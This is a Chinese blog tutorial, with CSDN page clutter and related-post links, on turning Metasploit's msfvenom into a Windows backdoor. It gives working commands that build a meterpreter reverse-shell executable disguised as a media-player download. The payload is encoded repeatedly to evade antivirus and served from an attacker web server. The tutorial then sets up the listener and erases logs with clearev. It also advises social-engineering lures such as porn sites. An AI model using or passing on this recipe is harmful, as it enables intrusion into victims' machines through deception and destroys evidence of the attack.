制作windows客户端恶意软件进行渗透

已于 2022-02-21 11:42:32 修改
阅读量1k 收藏 5
点赞数 2
分类专栏: kali渗透 文章标签: windows web安全 渗透测试
于 2022-02-20 16:22:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56988395/article/details/123031722
版权

目录

工具

靶机

客户端渗透原理

制作Windows恶意软件获取shell

工具

Metasploit

靶机

windows 2008 r2

相信大多数网友都是下载的虚拟机,所以请设置成桥接模式,确保位于同一网段

注:以下内容仅供学习交流,请勿用于非法用途

客户端渗透原理

在我们无法突破对方的网络边界时,往往需要使用客户端渗透这种方式对目标发起攻击,比如我们向目标发一个含有后门的程序,或者是一个word文档,pdf文件。想要达到效果同时也要利用好社会工程学,来诱惑受害者执行恶意程序。

由于有杀毒软件,所以我们可以利用颜色网站或者免杀来躲避查杀。

免杀可以通过修改二进制特征字符或者进行加密。

制作Windows恶意软件获取shell

msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线

生成xx影音.exe后门程序

使用一个编码器

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.242.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/xx影音1.exe

使用两个编码器进一步加强免杀能力

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.242.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 20 | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f exe -o /var/www/html/xx影音2.exe

参数说明

-a 指定架构,如:x86和x64,x86代表32位,x64代表64位。

--platform 指定平台,这里选择windows,通过 --l platforms可以查看所有支持的平台

-p 设置攻击载荷

-b 去掉坏字符,坏字符会影响payload的正常执行

启动apache2

systemctl start apache2

然后后去目标浏览器下载

http://192.168.242.128/xx影音2.exe

会弹出一个下载界面,点击下载打开即可

回到kali启用msf监听

msf6 > use exploit.multi/handler

设置payload

msf6 > set payload windows/meterpreter/reverse_tcp

成功建立会话,进入后可利用getuid查看权限,利用help可查看命令

clearev命令

入侵痕迹擦除

在渗透利用过程中难免留下日志等信息痕迹,使用clearev命令擦除痕迹后再跑。

命令:clearev

翎~翊
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
网络安全:制作 windows 和 linux 客户端恶意软件进行渗透
weixin_46035615的博客
04-21 5372
制作 windows 和 linux 客户端恶意软件进行渗透(拿到权限后开启屏幕共享 开启摄像头等等)
网络安全学习——渗透测试基础(四)
huaiqingluo的博客
10-20 397
msfvenom是一个Metasploit独立的有效负载生成器,也是msfpayload和msfencode的替代品。是用来生成后门的软件。CS使用了C/S架构,它分为客户端和服务端,服务端只要一个,客户端可有多个,多人 连接服务端后可协同测试,与其他人分享shell。思路就是利用社会工程学中人的心理,去为某些软件利用msf生成一些后门程序,进而通过带有后门的软件实现渗透获取shell。后门的生成是为了更好的理解渗透过程中的方法以及途径,进而达到更好的防护,而不是利用技巧去做攻击等不合理的行为。
【Metasploit】MSF常用命令
m0_62783065的博客
02-06 1844
【Metasploit】MSF常用命令
2024年软件测试最新渗透安全渗透测试流程_渗透性测试中文版,2024年最新阿里P8亲自教你
2301_76379671的博客
05-07 684
未加密的敏感数据容易受到破坏,因此,我们需要对敏感数据加密,这些数据包括:传输过程中的数据、存储的数据以及浏览器的交互数据。电信诈骗:是指通过电话、网络和短信方式,编造虚假信息,设置骗局,对受害人实施远程、非接触式诈骗,诱使受害人打款或转账的犯罪行为,通常以冒充他人及仿冒、伪造各种合法外衣和形式的方式达到欺骗的目的。杀猪盘:网络流行词,电信诈骗的一种,是一种网络交友诱导股票投资、赌博等类型的诈骗方式,"杀猪盘” 则是”从业者们”自己起的名字,是指放长线“养猪”诈骗,养得越久,诈骗得越狠。
渗透测试——后渗透攻击
YT的博客
02-18 6228
Meterpreter 是一个提供了运行时刻可扩展远程 API 调用的攻击载荷模块,后渗透攻击脚本由 Meterpreter 客户端所解释,再远程调用 Meterpreter 服务端 (即运行在目标机上的攻击载荷) 提供的 API 来实现的。 1. persistence 后渗透攻击模块 persistence 帮助信息如下: 输入命令:run persistence -X -i 5 -p 4...
Kali生成windows木马程序
qq_51950323的博客
09-07 9729
此文章为kali生成windows木马程序,进行的后渗透测试。此操作仅供虚拟机测试,请勿使用于非法途径。
Metasploit(3) 渗透测试之通过客户端进行渗透
weixin_41182861的博客
07-23 1070
客户端渗透测试原理 在我们在无法突破对方的网络边界的时候,往往需要使用客户端渗透这种方式对目标发起攻击,比如我们向目标发一个含有后门的程序,或者是一个word文档、pdf文件。想要达到效果同时也要利用好社会工程学,来诱骗受害者执行恶意程序。 客户端渗透技巧,通常用户的计算机都安装了安全软件,一般我们生成的恶意程序都会被检测,所以我们所设计的恶意软件可以利用人的劣根性,比如我们将恶意软件或网站伪装成色情软件或网站,这样目标会认为他本身就是不好的软件被安全软件检测是很正常的事情,如果他安耐不住关闭安全防护软件
一刻相册Windows客户端软件
09-18
一刻相册Windows客户端软件
Github Windows客户端.exe软件安装包
09-20
Github Windows客户端.exe软件安装包
AI工具 Windows客户端.exe软件安装包
09-20
AI工具 Windows客户端.exe软件安装包
雷克沙u盘加密软件windows客户端
最新发布
06-16
雷克沙u盘加密软件windows客户端
渗透测试-内网客户端渗透.pdf
02-25
《Metasploit渗透测试魔鬼训练营》读书笔记文档,是在我看书的过程中对书中理论和一些实践的总结。
Windows 下的 influxdb 客户端 Windows连接influxdb客户端
11-17
为了与InfluxDB进行交互,我们需要一个客户端工具,这正是“Windows下的influxdb客户端”所涉及的内容。本文将详细介绍如何在Windows上安装和使用InfluxDB客户端,以及它所依赖的一些关键库。 首先,InfluxDB ...
MSF常用命令
L_lemo004的博客
10-20 2589
Msf是kali下的这款强劲的专用工具,开源系统的网络安全问题测试工具前渗入后渗入环节都用获得,只有還是后渗入环节用的多。 Msf用途大概就是说exploit进攻,cve进攻,远程控制木马病毒进攻运用。 Msfconsole 开启msf Msfconsole -h 协助选择项 Banner 用以查询metasploit的版本信息,运用控制模块总数、payload总数 控制模块详细介绍: Exploits 渗入进攻控制模块 主要用于进攻方式 Auxiliary 輔助控制模块 主要用于信息内容搜集 Payloa
app渗透思路
y995zq的博客
02-20 1611
app
渗透测试笔记总结(七)——内网客户端渗透
Leon~博客
02-26 613
目录 一、客户端渗透 3、安全防护机制 二、针对浏览器的渗透攻击 1、堆喷射利用 2、msf中的浏览器攻击 三、浏览器攻击实例——ms11-050漏洞 四、浏览器第三方插件攻击——ActiveX 五、常见应用软件的渗透 1、内存攻击技术ROP 2、msf中的自动化fileformat攻击 3、对office软件的渗透—...
msf 提权和清除日志
发哥微课堂
01-17 1573
0x00:介绍 在获取目标系统 shell 后,如果遇到了普通的 user 账户,则在后渗透阶段会有一些局限性,例如获取 hash,修改注册表,装软件等,所以会涉及到接下来的提权操作,由 guest 到 user,最后到 administrator 级别。 0x01:提权 首先查看一下获取 shell 后的权限,进入 meterpreter 后输入 shell 进入目标系统的 cmd,然后输...
Meterpreter基础命令
公众号shadow sock7
05-25 2295
helpbackground把已打开的session放到后台cat输出文件文件内容cd && pwdclearev清除Windows上的应用日志,系统日志,和安全日志Demometerpreter > clearev [*] Wiping 97 records from Application... [*] Wiping 415 records from System... [*] Wiping 0
渗透之meterpreter学习笔记
迷风小白
11-08 7780
0x00 前言 由于最近想学习关于内网渗透的一些知识,前面也有师傅写了关于meterpreter的使用攻略,我这里就来复现学习一下。 Meterpreter是Metasploit框架中的一个扩展模块,作为后渗透阶段的利器,其强大之处可想而知,我这里就简单介绍一下常用命令。 0x01 系统命令 基本系统命令 background # 将当前会话放置后台 sessions # sessions...
Windows NTP服务器配置教程:搭建与客户端同步详解
本文档详细介绍了如何在Windows环境中配置时间同步,包括设置时间服务器和客户端的过程。首先,我们从创建Windows时间服务器开始: 1. 登录到作为时间服务器的主机,通过gpedit.msc打开本地组策略编辑器,找到并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

翎~翊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值